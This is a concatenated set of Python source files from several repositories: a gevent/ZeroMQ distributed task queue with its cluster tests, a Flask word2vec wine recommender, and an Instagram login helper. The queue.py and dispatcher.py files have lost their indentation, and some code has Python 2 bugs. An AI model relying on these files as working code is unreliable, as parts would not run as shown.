# Shared cluster fixture, started/stopped around each test via with_setup.
_cluster = Cluster(size=2, replica_factor=2)
def start_cluster():
    _cluster.start()
def stop_cluster():
    _cluster.stop()
@with_setup(start_cluster, stop_cluster)
def test_cluster_starts_and_all_nodes_work():
    # one task per node; the countdown finishes only if every node dispatches
    countdown = TaskCountdown(len(_cluster))
    url = countdown.start()
    for node in _cluster.nodes:
        node.enqueue('test', {'url': url})
    countdown.wait(1)
    assert countdown.finished()
@with_setup(start_cluster, stop_cluster)
def test_replication_by_killing_node_after_schedule():
    # kill the node that accepted the task; its replica must still fire
    countdown = TaskCountdown(1)
    url = countdown.start()
    assert _cluster.nodes[0].enqueue('test', {'url': url, 'countdown': 1})
    assert not countdown.finished()
    _cluster.nodes[0].terminate()
    countdown.wait(1)
    assert countdown.finished()
@with_setup(start_cluster, stop_cluster)
def test_add_node_and_that_it_replicates_into_cluster():
    countdown = TaskCountdown(2)
    url = countdown.start()
    node = _cluster.add()
    # give the new node time to join and connect to peers
    gevent.sleep(2)
    print url
    assert node.enqueue('test', {'url': url})
    assert node.enqueue('test', {'url': url})
    #node.enqueue('test', {'url': url, 'countdown': 2})
    #node.terminate()
    countdown.wait(2)
    print countdown.count
    assert countdown.finished()
def test_killing_the_leader_means_nothing():
    # start cluster
    # kill leader
    # add node
    # hit nodes twice
    # assert tasks
    pass
|
progrium/miyamoto | miyamoto/cluster.py | """A distributed group membership module
This provides distributed group membership for easily building clustered
applications with gevent. Using this in your app, you just provide the IP
of another node in the cluster and it will receive the IPs of all nodes in
the cluster. When a node joins or drops from the cluster, all other nodes find
out immediately.
The roster is managed by a leader. When you create a cluster, you tell the
first node it is the leader (by simply pointing it to its own IP). As you
add nodes, you can point them to the leader or any other node. If a node
is not the leader, it will redirect the connection to the leader. All nodes
also maintain a keepalive with the leader.
If the leader drops from the cluster, the nodes will dumbly pick a new leader
by taking the remaining node list, sorting it, and picking the first node. If
a node happens to get a different leader, as long as it is in the cluster, it
will be redirected to the right leader.
To try it out on one machine, you need to make several more loopback interfaces:
In OSX:
ifconfig lo0 inet 127.0.0.2 add
ifconfig lo0 inet 127.0.0.3 add
ifconfig lo0 inet 127.0.0.4 add
In Linux:
ifconfig lo:2 127.0.0.2 up
ifconfig lo:3 127.0.0.3 up
ifconfig lo:4 127.0.0.4 up
Now you can start the first node on 127.0.0.1:
INTERFACE=127.0.0.1 python cluster.py
The first argument is the leader, the second is the interface to bind to.
Start the others pointing to 127.0.0.1:
INTERFACE=127.0.0.2 LEADER=127.0.0.1 python cluster.py
INTERFACE=127.0.0.3 LEADER=127.0.0.1 python cluster.py
Try starting the last one pointing to a non-leader:
INTERFACE=127.0.0.4 LEADER=127.0.0.3 python cluster.py
Now you can kill any node (including the leader) and bring up another node
pointing to any other node, and they all get updated immediately.
"""
import gevent.monkey; gevent.monkey.patch_all()
import logging
import socket
import json
import gevent
import gevent.server
import gevent.socket
import constants
import util
logger = logging.getLogger('cluster')
# Raised when the leader cannot be reached after retries.
class ClusterError(Exception): pass
# Internal control-flow signal: reconnect to a (possibly new) leader.
class NewLeader(Exception): pass
class ClusterManager(object):
    """Maintains cluster membership; see the module docstring for the
    leader/follower protocol."""
    def __init__(self, leader, callback=None, interface=None, port=constants.DEFAULT_CLUSTER_PORT):
        """ Callback argument is called when the cluster updates. """
        if interface is None:
            interface = socket.gethostbyname(socket.gethostname())
        self.interface = interface
        self.leader = leader      # believed leader; corrected on redirect
        self.callback = callback  # receives a copy of the roster on change
        self.port = port
        self.cluster = set()      # current roster of host addresses
        self.pool = []
        self.server = gevent.server.StreamServer((self.interface, self.port), self._connection_handler)
        self.connections = {}     # (leader only) member host -> socket
    def is_leader(self):
        return self.interface == self.leader
    def start(self):
        """Start the membership server; followers also connect to the leader."""
        logger.info("Cluster manager starting for %s on port %s" % (self.interface, self.port))
        self.server.start()
        if self.is_leader():
            self.cluster.add(self.interface)
            if self.callback:
                self.callback(self.cluster.copy())
        else:
            gevent.spawn(self.connect)
    def connect(self):
        """
        Connects to the currently known leader. It maintains a connection expecting
        JSON lists of hosts in the cluster. It should receive a list on connection,
        however, if a list of one, this is a redirect to the leader (you hit a node
        in the cluster that's not the leader). We also maintain a keepalive. If we
        disconnect, it does a leader elect and reconnects.
        """
        while True:
            logger.info("Connecting to leader %s on port %s" % (self.leader, self.port))
            try:
                client = util.connect_and_retry((self.leader, self.port),
                            source_address=(self.interface, 0), max_retries=5)
            except IOError:
                raise ClusterError("Unable to connect to leader: %s" % self.leader)
            logger.info("Connected to leader")
            # Use TCP keepalives
            keepalive = gevent.spawn_later(5, lambda: client.send('\n'))
            try:
                for line in util.line_protocol(client, strip=False):
                    if line == '\n':
                        # Keepalive ack from leader
                        keepalive.kill()
                        keepalive = gevent.spawn_later(5, lambda: client.send('\n'))
                    else:
                        new_cluster = json.loads(line)
                        if len(new_cluster) == 1:
                            # Cluster of one means you have the wrong leader
                            self.leader = new_cluster[0]
                            logger.info("Redirected to %s..." % self.leader)
                            raise NewLeader()
                        else:
                            self.cluster = set(new_cluster)
                            if self.callback:
                                self.callback(self.cluster.copy())
                # connection dropped: elect a new leader by sorting the
                # remaining roster and picking the first host
                self.cluster.remove(self.leader)
                candidates = list(self.cluster)
                candidates.sort()
                self.leader = candidates[0]
                logger.info("New leader %s..." % self.leader)
                # TODO: if i end up thinking i'm the leader when i'm not
                # then i will not rejoin the cluster
                raise NewLeader()
            except NewLeader:
                if self.callback:
                    self.callback(self.cluster.copy())
                if not self.is_leader():
                    gevent.sleep(1) # TODO: back off loop, not a sleep
                else:
                    # we became the leader; stop the follower connect loop
                    break
    def _connection_handler(self, socket, address):
        """
        If not a leader, a node will simply return a single item list pointing
        to the leader. Otherwise, it will add the host of the connected client
        to the cluster roster, broadcast to all nodes the new roster, and wait
        for keepalives. If no keepalive within timeout or the client drops, it
        drops it from the roster and broadcasts to all remaining nodes.
        """
        #print 'New connection from %s:%s' % address
        if not self.is_leader():
            # redirect: a single-item roster means "talk to this leader instead"
            socket.send(json.dumps([self.leader]))
            socket.close()
        else:
            self._update(add={'host': address[0], 'socket': socket})
            timeout = gevent.spawn_later(10, lambda: self._shutdown(socket))
            for line in util.line_protocol(socket, strip=False):
                # any line counts as a keepalive; reset the drop timer and ack
                timeout.kill()
                timeout = gevent.spawn_later(10, lambda: self._shutdown(socket))
                socket.send('\n')
                #print "keepalive from %s:%s" % address
            #print "client disconnected"
            self._update(remove=address[0])
    def _shutdown(self, socket):
        # force-close a client that stopped sending keepalives
        try:
            socket.shutdown(0)
        except IOError:
            pass
    def _update(self, add=None, remove=None):
        """ Used by leader to manage and broadcast roster """
        if add is not None:
            self.cluster.add(add['host'])
            self.connections[add['host']] = add['socket']
        if remove is not None:
            self.cluster.remove(remove)
            del self.connections[remove]
        for conn in self.connections:
            self.connections[conn].send('%s\n' % json.dumps(list(self.cluster)))
        if self.callback:
            self.callback(self.cluster.copy())
if __name__ == '__main__':
    # Demo entry point: join/lead a cluster from env config and print the
    # roster on every membership change.
    import os
    interface = os.environ.get('INTERFACE')
    leader = os.environ.get('LEADER', interface)
    def print_cluster(cluster):
        print json.dumps(list(cluster))
    print "%s: Using leader %s..." % (interface, leader)
    ClusterManager(leader, callback=print_cluster, interface=interface).start()
    while True:
        gevent.sleep()
progrium/miyamoto | attic/zmq_prototype/cluster.py | <filename>attic/zmq_prototype/cluster.py
import sys
import os
import random
import eventlet
import collections
from eventlet.green import socket
from eventlet.green import zmq
from eventlet.hubs import use_hub
from zmq import devices
import memcache
use_hub('zeromq')
# Raised when a CAS-guarded membership update never succeeded within `retries`.
class CoordinationError(Exception): pass
class ClusterNode(object):
    """ This is a simple cluster management system using memcache to coordinate.
        It uses heartbeats to keep the local cluster representation fresh while
        refreshing the node's record in memcache for the others. If a node
        doesn't heartbeat before its TTL, it will be dropped from peers when
        they heartbeat. """
    retries = 3  # attempts for each CAS-guarded roster update
    def __init__(self, context, client, prefix, id, ttl=30, port=7777):
        self.context = context  # zmq context for the control sockets
        self.client = client    # memcache client used for coordination
        self.index = prefix     # memcache key holding the roster
        self.id = id            # this node's address/identifier
        self.ttl = ttl          # seconds before a silent node is dropped
        self.port = port        # control pub/sub port
        self.cluster = set()
        self.control = None     # SUB socket, created on join()
        self.callbacks = collections.defaultdict(list)
    def join(self):
        """CAS ourselves into the roster; start heartbeating on success."""
        for retry in range(self.retries):
            cluster = self.client.gets(self.index) or ''
            if cluster:
                # drop members whose heartbeat key has expired
                cluster = self._cleanup_index(set(cluster.split(',')))
            else:
                cluster = set()
            self.client.set('%s.%s' % (self.index, self.id), self.id, time=self.ttl)
            cluster.add(self.id)
            if self.client.cas(self.index, ','.join(cluster)):
                print "[Cluster] Joined as %s" % self.id
                self.cluster = cluster
                self._schedule_heartbeat()
                self._create_sockets(self.cluster)
                return True
        raise CoordinationError()
    def leave(self):
        """Delete our heartbeat record and CAS ourselves out of the roster."""
        for retry in range(self.retries):
            self.client.delete('%s.%s' % (self.index, self.id))
            cluster = self.client.gets(self.index) or ''
            if cluster:
                cluster = self._cleanup_index(set(cluster.split(',')))
            else:
                cluster = set()
            if self.client.cas(self.index, ','.join(cluster)):
                self.cluster = set()
                return True
        raise CoordinationError()
    def peers(self):
        """All known members except ourselves."""
        return list(self.cluster - set([self.id]))
    def all(self):
        return list(self.cluster)
    def _cleanup_index(self, cluster):
        # keep only nodes whose per-node heartbeat key is still alive
        index = self.client.get_multi(cluster, '%s.' % self.index)
        return set([n for n in index if n])
    def _create_sockets(self, addresses=None):
        # SUB socket receives control messages; PUB broadcasts ours
        self.control = self.context.socket(zmq.SUB)
        self.control.setsockopt(zmq.SUBSCRIBE, '')
        self._control_out = self.context.socket(zmq.PUB)
        self._control_out.bind('tcp://%s:%s' % (self.id, self.port))
        if addresses:
            self._connect_sockets(addresses)
    def _connect_sockets(self, addresses):
        for address in addresses:
            self.control.connect('tcp://%s:%s' % (address, self.port))
    def send(self, message):
        """Broadcast a control message to the cluster."""
        self._control_out.send(message)
    def _schedule_heartbeat(self):
        """Refresh our record at a jittered interval, pick up new peers,
        and reschedule itself."""
        if len(self.cluster):
            # jitter so nodes don't all hit memcache at the same moment
            random_interval = random.randint(self.ttl/2, self.ttl-(self.ttl/5))
            def update():
                self.client.set('%s.%s' % (self.index, self.id), self.id, time=self.ttl)
                old_cluster = self.cluster
                self.cluster = self._cleanup_index(set(self.client.get(self.index).split(',')))
                print self.cluster
                added = self.cluster - old_cluster
                if added:
                    print "[Cluster] Added %s" % ', '.join(added)
                    self._connect_sockets(added)
                    for cb in self.callbacks['add']:
                        cb(added)
                self._schedule_heartbeat()
            eventlet.spawn_after(random_interval, update)
progrium/miyamoto | miyamoto/queue.py | <filename>miyamoto/queue.py
import gevent.monkey; gevent.monkey.patch_all()

import socket
import urllib2
try:
    import json
except ImportError:
    import simplejson as json

import gevent
import gevent.event
import gevent.pywsgi
import gevent.queue

from cluster import ClusterManager
from scheduler import DistributedScheduler
from task import Task
import constants
class QueueServer(object):
# TODO: make args list
def __init__(self, leader, replica_factor=constants.DEFAULT_REPLICA_FACTOR,
replica_offset=constants.DEFAULT_REPLICA_SECS_OFFSET, interface=None,
frontend_port=constants.DEFAULT_FRONTEND_PORT,
backend_port=constants.DEFAULT_BACKEND_PORT,
cluster_port=constants.DEFAULT_CLUSTER_PORT):
if interface is None:
interface = socket.gethostbyname(socket.gethostname())
self.queue = gevent.queue.Queue()
self.frontend = gevent.pywsgi.WSGIServer((interface, frontend_port), self._frontend_app, log=None)
self.scheduler = DistributedScheduler(self.queue, leader, replica_factor=replica_factor,
replica_offset=replica_offset, interface=interface, port=backend_port, cluster_port=cluster_port)
self._ready_event = None
def start(self, block=True):
self.frontend.start()
self.scheduler.start()
while not self.frontend.started:
gevent.sleep(1)
self._ready_event.set()
while block:
gevent.sleep(1)
def _frontend_app(self, env, start_response):
try:
queue_name = env['PATH_INFO']
content_type = env['CONTENT_TYPE']
body = env['wsgi.input'].read()
task = Task(queue_name, content_type, body)
self.scheduler.schedule(task) # TODO: needs queue on the other end
start_response('200 OK', [('Content-Type', 'application/json')])
return ['{"status": "scheduled", "id": "%s"}\n' % task.id]
except NotImplemented, e:
start_response('500 Error', [('Content-Type', 'application/json')])
return [json.dumps({"status": "error", "reason": repr(e)})]
|
progrium/miyamoto | miyamoto/util.py | import random
import gevent.socket
def line_protocol(socket, strip=True):
    """Yield lines read from *socket* until EOF, a blank line, or an IOError.

    The socket is wrapped with makefile(). With strip=True (the default)
    surrounding whitespace is removed from each line before yielding.
    Iteration ends at the first falsy line (readline() returns '' at EOF,
    and a stripped blank line is also falsy) or on a read error.
    """
    stream = socket.makefile()
    while True:
        try:
            line = stream.readline()  # '' at EOF
            if strip and line is not None:
                line = line.strip()
        except IOError:
            line = None
        if not line:
            break
        yield line
def connect_and_retry(address, source_address=None, max_retries=None):
    """Connect to *address*, retrying on IOError with jittered exponential backoff.

    Retries forever unless *max_retries* is given, in which case an IOError
    is raised once the retry budget is exhausted. Returns the connected
    gevent socket on success.
    """
    MAX_DELAY = 3600
    FACTOR = 2.7182818284590451  # (math.e)
    JITTER = 0.11962656472  # molar Planck constant times c, joule meter/mole
    delay = 1.0
    attempts = 0
    while True:
        try:
            return gevent.socket.create_connection(address, source_address=source_address)
        except IOError:
            attempts += 1
            if max_retries is not None and (attempts > max_retries):
                raise IOError("Unable to connect after %s retries" % max_retries)
            # Grow the delay geometrically, cap it, then add Gaussian jitter.
            delay = min(delay * FACTOR, MAX_DELAY)
            delay = random.normalvariate(delay, delay * JITTER)
            gevent.sleep(delay)
|
progrium/miyamoto | scripts/sampler.py | import collections
import operator
import time
import os
import gevent.pywsgi
from gevent_zeromq import zmq
class RateSampler(object):
    """Tool for pushing rate over time data."""
    def __init__(self, frequency=1, resolution=1, parent=None, callback=None, name=None):
        """ frequency: Rate update frequency in seconds
            resolution: Interval to average data over in seconds
            parent: Another RateSampler that ticks will propagate to
            callback: Optional callback when frequency is updated"""
        self.frequency = frequency
        self.resolution = resolution
        self.parent = parent
        self.callback = callback
        # Tick counts keyed by time bucket (int(time / resolution)).
        self.samples = collections.defaultdict(int)
        self.ticks = 0
        self.last_start = None
        self.last_value = 0
        if not name and parent:
            self.name = parent.name
        else:
            self.name = name

    def _update(self):
        # Recompute the averaged rate once a full frequency window has passed.
        if self.last_start and int(time.time() - self.last_start) > self.frequency:
            # Add empty samples
            # NOTE(review): pads with `frequency - len(samples)` zero buckets
            # keyed 0..k; the intent (vs. resolution-based padding) is unclear.
            for x in range(self.frequency - len(self.samples)):
                self.samples[x] = 0
            # Idiom fix: sum() replaces the Python 2-only builtin
            # reduce(operator.add, ...); identical result for int counts.
            self.last_value = sum(self.samples.values()) / self.resolution / self.frequency
            self.last_start = int(time.time())
            if self.callback:
                # reactor.callLater(0, self.callback, self.last_value, self.ticks)
                self.callback(self.last_value, self.ticks)
            self.ticks = 0
            self.samples = collections.defaultdict(int)

    def tick(self, ticks=1):
        """Record *ticks* events now, propagate to the parent, return self."""
        if not self.last_start:
            self.last_start = int(time.time())
        self._update()
        if self.parent:
            self.parent.tick(ticks)
        self.samples[int(time.time() / self.resolution)] += ticks
        self.ticks += ticks
        return self

    def getvalue(self):
        """Return the most recently computed rate (updating if due)."""
        self._update()
        return self.last_value

    def __int__(self):
        return self.getvalue()

    def __str__(self):
        # Okay, hardcoding 1 sec resolutions for now
        return "%i %s/sec" % (self.getvalue(), self.name or 'ticks')

    def __repr__(self):
        return "<SampledRate: %i avg/%is updated/%is>" % (self.getvalue(), self.frequency, self.resolution)
def redraw(v, t):
    """Callback fired once per frequency window: repaint the terminal."""
    os.system("clear")
    print "Last sample: %s tasks/sec" % v

# Shared sampler: 1s update frequency, 5s averaging window.
rate = RateSampler(1, 5, callback=redraw, name='tasks')
ctx = zmq.Context()

def http_sampler(env, start_response):
    """WSGI endpoint: every HTTP request counts as one tick."""
    rate.tick()
    start_response('200 OK', [])
    return ['ok']

def zmq_sampler():
    """ZeroMQ REP endpoint: every received message counts as one tick."""
    socket = ctx.socket(zmq.REP)
    socket.bind('tcp://127.0.0.1:9999')
    while True:
        socket.recv()
        rate.tick()
        socket.send("ok")

# Serve both samplers: zmq in a greenlet, HTTP in the main loop.
gevent.spawn(zmq_sampler)
server = gevent.pywsgi.WSGIServer(('', int(os.environ.get('PORT', 9099))), http_sampler, log=None)
server.serve_forever()
|
progrium/miyamoto | miyamoto/dispatcher.py | import gevent.monkey; gevent.monkey.patch_all()
import socket
import urllib2
try:
import json
except ImportError:
import simplejson as json
from gevent_zeromq import zmq
import gevent
import gevent.monkey
import gevent.server
import gevent.socket
import gevent.queue
import gevent.event
import gevent.coros
import httplib2
from task import Task
import util
import constants
class TaskFailure(Exception):
    """Signals that a dispatched task did not complete successfully."""
    pass
class DispatchClient(object):
    """Client side of the dispatcher pair socket: forwards serialized tasks
    and relays event lines back to a callback."""
    def __init__(self, interface, callback):
        # callback(event, payload) is invoked for each 'event:payload' line
        # received from the dispatcher.
        self.interface = interface
        self.callback = callback
        self.socket = None

    def start(self):
        """Spawn the background connect/receive loop."""
        gevent.spawn(self._run)

    def dispatch(self, task):
        """Send a serialized task to the dispatcher, if currently connected."""
        if self.socket:
            self.socket.send('%s\n' % task.serialize())

    def _run(self):
        # Reconnect forever; each received line is split as 'event:payload'.
        while True:
            try:
                self.socket = gevent.socket.create_connection((self.interface, 6002), source_address=(self.interface, 0))
                for line in util.line_protocol(self.socket):
                    event, payload = line.split(':', 1)
                    self.callback(event, payload)
            except IOError:
                pass
            print "disconnected from dispatcher, retrying..."
class Dispatcher(object):
def __init__(self, interface, zmq_context, workers=10):
# hardcoding for now
self.workers = workers
self.server = gevent.server.StreamServer((interface, 6002), self._connection_handler)
self.queue = gevent.queue.Queue()
self.scheduler = None
self.zmq = zmq_context
self.zmq_sockets = {}
def start(self, block=True):
self.server.start()
for n in xrange(self.workers):
gevent.spawn(self._dispatcher)
while block:
gevent.sleep(1)
def _dispatcher(self):
http = httplib2.Http()
while True:
try:
task = Task.unserialize(self.queue.get())
timeout = gevent.Timeout(constants.WORKER_TIMEOUT)
timeout.start()
self.scheduler.send('start:%s\n' % task.id)
if task.url.startswith('http'):
headers = {"User-Agent": "Miyamoto/0.1", "X-Task": task.id, "X-Queue": task.queue_name}
resp, content = http.request(task.url, method=task.method, headers=headers)
else:
zmq_remotes = frozenset(task.url.split(','))
if not zmq_remotes in self.zmq_sockets:
sock = self.zmq.socket(zmq.REQ)
lock = gevent.coros.Semaphore()
for remote in zmq_remotes:
sock.connect(remote)
self.zmq_sockets[zmq_remotes] = (sock, lock)
else:
sock, lock = self.zmq_sockets[zmq_remotes]
try:
lock.acquire() # Because send/recv have to be done together
sock.send(task.url)
resp = sock.recv()
except zmq.ZMQError:
raise
finally:
lock.release()
self.scheduler.send('success:%s\n' % task.id)
except (gevent.Timeout, zmq.ZMQError, TaskFailure), e:
self.scheduler.send('failure:%s:%s\n' % (task.id, str(e)))
finally:
timeout.cancel()
def _connection_handler(self, socket, address):
print "pair connected"
self.scheduler = socket
for line in util.line_protocol(socket):
self.queue.put(line)
print "pair dropped"
|
progrium/miyamoto | miyamoto/tests/test_service.py | <gh_stars>1-10
import gevent
from miyamoto import service
class BasicService(service.Service):
    """Minimal concrete Service used by the tests: ready immediately on start."""
    def __init__(self, name):
        super(BasicService, self).__init__()
        self.name = name
    def _start(self):
        # Returning service.READY marks the service ready synchronously.
        return service.READY
    def _stop(self):
        pass
class SlowReadyService(BasicService):
    """Service that only becomes ready ~0.5s after start, via a greenlet."""
    def _start(self):
        # No READY returned here; readiness is signalled later by _run.
        self.spawn(self._run)
    def _run(self):
        gevent.sleep(0.5)
        self._ready_event.set()
def test_basic_service():
    """A BasicService reports started and ready right after start()."""
    s = BasicService('test')
    s.start()
    assert s.started == True, "Service is not started"
    assert s.ready == True, "Service is not ready"
    s.stop()
    assert s.started == False, "Service did not stop"
def test_slow_ready_service():
    """Non-blocking start is not ready immediately; blocking start is."""
    s = SlowReadyService('test')
    s.start(block_until_ready=False)
    assert s.ready == False, "Service was ready too quickly"
    assert s.started == True, "Service is not started"
    s.stop()
    assert s.ready == False, "Service was still ready after stop"
    assert s.started == False, "Service did not stop"
    s.start()
    assert s.ready == True, "Service was not ready after blocking start"
    s.stop()
    assert s.ready == False, "Service was still ready after stop"
def test_child_service():
    """Children registered in _children start/stop with their parent."""
    class ParentService(BasicService):
        def __init__(self, name):
            super(ParentService, self).__init__(name)
            self.child = SlowReadyService('child')
            self._children.append(self.child)
        def _start(self):
            return service.READY
    s = ParentService('parent')
    s.start()
    assert s.child.ready == True, "Child service is not ready"
    assert s.ready == True, "Parent service is not ready"
    s.stop()
    assert s.child.started == False, "Child service is still started"
    assert s.child.ready == False, "Child service is still ready"
def test_service_greenlets():
    """Greenlets spawned via Service.spawn are killed when the service stops."""
    class GreenletService(BasicService):
        def _start(self):
            for n in xrange(3):
                self.spawn(self._run, n)
            return service.READY
        def _run(self, index):
            while True:
                gevent.sleep(0.1)
    s = GreenletService('greenlets')
    s.start()
    for greenlet in s._greenlets:
        assert not greenlet.ready(), "Greenlet is ready when it shouldn't be"
    s.stop()
    for greenlet in s._greenlets:
        assert greenlet.ready(), "Greenlet isn't ready after stop"
|
progrium/miyamoto | attic/zmq_prototype/agenda.py | <reponame>progrium/miyamoto<filename>attic/zmq_prototype/agenda.py<gh_stars>1-10
import time
class AgendaStoreError(Exception):
    """Raised when an agenda item cannot be stored after all retries."""
    pass
class Agenda(object):
    """ An agenda is like an append-only list structure that's partitioned by
        "time buckets" (think unrolled linked list). The time-based indexes
        make it easy to query timespans, namely items since and items until,
        which lets it be used for scheduling items in the future. """
    # Store attempts before giving up on add().
    retries = 3

    def __init__(self, client, prefix, resolution=10, ttl=0):
        # client: memcache-style client (append/add/get_multi).
        # prefix: key prefix; buckets are named '<prefix>-<floored time>'.
        # resolution: bucket width in seconds; ttl: memcache expiry for buckets.
        self.client = client
        self.prefix = prefix
        self.resolution = resolution
        self.ttl = ttl

    def add(self, item, at=None):
        """Append *item* to the bucket covering *at* (default: now).

        Tries append first (bucket exists), then add (new bucket), retrying;
        raises AgendaStoreError if no attempt succeeds.
        """
        bucket = self._bucket(at or time.time())
        for retry in range(self.retries):
            if self.client.append(bucket, ',%s' % str(item), self.ttl) or \
               self.client.add(bucket, str(item), self.ttl):
                return True
        raise AgendaStoreError()

    def get(self, since=None, until=None):
        """Return items in buckets from *since* up to (excluding) *until*,
        or None if no buckets exist in that span."""
        since = self._time(since or time.time())
        until = self._time(until or time.time())
        # Bug fix: floor division keeps this an int on Python 3 as well
        # (a plain '/' yields a float there and breaks range()).
        num_buckets = (until - since) // self.resolution
        keys = [self._bucket(since + (i * self.resolution)) for i in range(num_buckets)]
        buckets = self.client.get_multi(keys)
        if buckets:
            # NOTE(review): python-memcache's get_multi returns a dict, so this
            # join would iterate keys rather than stored values — verify which
            # client is used and whether .values() was intended.
            return ','.join(buckets).split(',')

    def _time(self, time):
        # Floor the timestamp to the bucket resolution boundary.
        return int(time) - int(time) % self.resolution

    def _bucket(self, time):
        return '%s-%s' % (self.prefix, self._time(time))
# in progress flag, remember in node <- cleanup, check if still around
# emitter catches internal jobs
|
kvnhu/oeno | oeno.py | import difflib
import numpy as np
import os
import pandas as pd
import re
import string
from flask import Flask
from flask import render_template
from flask import request
from gensim.models import Word2Vec
from sklearn.decomposition import PCA
app = Flask(__name__)

# Column names used throughout the wine dataset / DataFrame.
DESCRIPTION = 'description'
TITLE = 'title'
EMBEDDING = 'embedding'

WINE_DATA_FILE_PATH = "./data/winemag-data-130k-v2.csv"

# Module-level mutable state shared across Flask request handlers;
# populated lazily by fit_model_and_compute_description_embeddings().
original_wine = None
wine_term = None
wines = None
model = None
@app.route("/")
def index():
    """Render the landing page for the web app."""
    return render_template('index.ejs')
@app.route("/search-wine", methods=['POST'])
def recommend_wine():
    """Recommend wines similar to the one the user says they enjoyed.

    Fuzzy-matches the submitted title against the catalog, then ranks all
    wines by dot product of their description embeddings against the match.
    """
    global original_wine
    global wines
    global model
    print('fitting model and obtaining original enjoyed wine...')
    fit_model_and_compute_description_embeddings()
    original_wine = str(request.form['wine'])
    def match_wine_title():
        # Index of the catalog title most similar to the user's input.
        title_match_scores = wines[TITLE].apply(lambda x: difflib.SequenceMatcher(None, original_wine.lower(), x.lower()).ratio())
        return title_match_scores.argmax()
    print('matching wines...')
    matched_idx = match_wine_title()
    # Embeddings are L2-normalized, so the dot product is cosine similarity.
    description_match_scores = wines[EMBEDDING].apply(
        lambda x: np.dot(
            np.array(x),
            np.array(wines[EMBEDDING].iloc[matched_idx])
        )
    )
    print('generating output...')
    html = ""
    # Top 11 because the best match is the queried wine itself.
    for wine in wines[TITLE][description_match_scores.nlargest(11).index]:
        html += wine + '<br>'
    return html
@app.route("/search-term", methods=['POST'])
def get_wine_term():
    """Return the tasting terms closest to the submitted term (word2vec)."""
    global wine_term
    global model
    print('fitting model and obtaining wine term...')
    fit_model_and_compute_description_embeddings(model_only=True)
    wine_term = request.form['term'].lower()
    print ('generating output...')
    html = u"Closest terms to %s:<br>" % wine_term
    # NOTE(review): term.decode assumes byte strings (Python 2 gensim); on
    # Python 3 terms are str and decode would raise — hence the fallback print.
    for term, score in model.wv.most_similar(wine_term, topn=1000):
        try:
            html += '> ' + term.decode('utf-8') + '<br>'
        except:
            print (term)
    return html
@app.route("/wine-math", methods=['POST'])
def wine_math():
    """Compute wine flavor arithmetic (word2vec positive/negative analogy),
    e.g. "oak + vanilla - fruit", grouped into strong and weak matches."""
    global wine_term
    global model
    print('fitting model and obtaining wine terms...')
    fit_model_and_compute_description_embeddings(model_only=True)
    add_terms = request.form['adds'].lower()
    subtract_terms = request.form['subtracts'].lower()
    # Normalize ", "-separated input into clean comma-separated term lists.
    add_term_list = ','.join(add_terms.split(', ')).split(',')
    sub_term_list = ','.join(subtract_terms.split(', ')).split(',')
    print ('generating output...')
    html = u"%s <br> - %s <br> = <br>" % (' + '.join(add_term_list), ' - '.join(sub_term_list))
    strong_html = "Strong matches:<br>"
    weak_html = "Weak matches:<br>"
    for term, score in model.wv.most_similar(positive=add_term_list, negative=sub_term_list, topn=100):
        # Skip results that are near-duplicates of the query terms themselves.
        no_match = True
        for candidate in (add_term_list + sub_term_list):
            if difflib.SequenceMatcher(None, term.decode('utf-8'), candidate.decode('utf-8')).ratio() > 0.5:
                print term
                no_match = False
        if no_match:
            # Bucket by similarity score.
            if score > 0.5:
                strong_html += '> ' + term.decode('utf-8') + '<br>'
            elif score > 0.3:
                weak_html += '> ' + term.decode('utf-8') + '<br>'
    return html + '<br>' + strong_html + '<br>' + weak_html
def prepare_dataset(fp):
    """Load the wine CSV, drop reviews with duplicate descriptions, and
    re-index the rows from zero."""
    frame = pd.read_csv(fp)
    frame = frame.drop_duplicates(subset=DESCRIPTION)
    frame.index = range(len(frame))
    return frame
def tokenize_descriptions(descriptions):
    """Tokenize review descriptions to be digested by Word2Vec.

    Each description is split on spaces and hyphens, lowercased, and has
    all punctuation characters removed from every token.
    """
    # Portability fix: str.translate(None, string.punctuation) is Python 2
    # only; this regex deletion removes the same character set on 2 and 3.
    punctuation_re = re.compile('[%s]' % re.escape(string.punctuation))
    return [
        [
            punctuation_re.sub('', word.lower())
            for word in re.split(' |-', sentence)
        ]
        for sentence in descriptions
    ]
def train_language_model(sentences, min_count=10, size=500, window=10, sample=1e-3):
    """Train a Word2Vec embedding on the review corpus.

    Parameters
    ----
    sentences : list of lists of strings
    min_count : minimum frequency of a term to be trained on/fitted
    size : dimensionality of the Word2Vec vector space
    window : context window when training (narrower focuses on word meaning; wider focuses on topical meaning)
    sample : sampling rate for high frequency words
    """
    return Word2Vec(sentences, min_count=min_count, size=size, window=window, sample=sample)
def fit_model_and_compute_description_embeddings(fp='wine.model', model_only=False):
    """ Fits the model, and then uses the model to compute the normalized sum of word vectors for each description."""
    # Lazily populates the module-level `model` (and, unless model_only,
    # `wines`) exactly once; later calls are no-ops.
    global wines
    global model
    if not model:
        if model_only and os.path.exists(fp):
            # Fast path: only the trained model is needed, load from disk.
            model = Word2Vec.load(fp)
        else:
            wines = prepare_dataset(WINE_DATA_FILE_PATH)
            sentences = tokenize_descriptions(list(wines[DESCRIPTION].values))
            if os.path.exists(fp):
                model = Word2Vec.load(fp)
            else:
                model = train_language_model(sentences)
                model.save(fp)
            if not model_only:
                # Each description embedding is the L2-normalized sum of the
                # vectors of its unique in-vocabulary words.
                normed = []
                for sentence in sentences:
                    summed = np.sum([model.wv[word] for word in np.unique(sentence)
                                     if (word in model.wv)
                                     # and (vocab[word] < 10000)
                                     ], axis=0)
                    normed.append(summed / np.sum(summed ** 2.0) ** 0.5)
                wines[EMBEDDING] = normed
# Run the Flask development server when executed directly.
if __name__ == '__main__':
    app.run()
|
ractyfree/instaStoiner | classes/Instagram.py |
import os
import random
import time
import logging
import sys
from classes.InstagramLinkEndpoints import *
class Instagram:
    """Thin wrapper around a browser driver for logging in to Instagram and
    viewing user stories.

    Args:
        login: account name typed into the login form.
        password: account password.
        browser: driver exposing openPageWaitForElem / sendTextForm /
            locateElemXpath (see ChromeDriverClass).
    """
    def __init__(self, login, password, browser):
        self.login = login
        self.password = password
        self.browser = browser

    def doLogin(self):
        """Fill in the login form; the user must click the login button manually."""
        self.browser.openPageWaitForElem(InstagramLinkEndpoints.loginPage, "//input[@name='username']")
        self.browser.sendTextForm(self.login, "//input[@name='username']")
        self.browser.sendTextForm(self.password, "//input[@name='password']")
        showPassword = self.browser.locateElemXpath("//div/button[@class='sqdOP yWX7d _8A5w5 ']")
        showPassword.click()
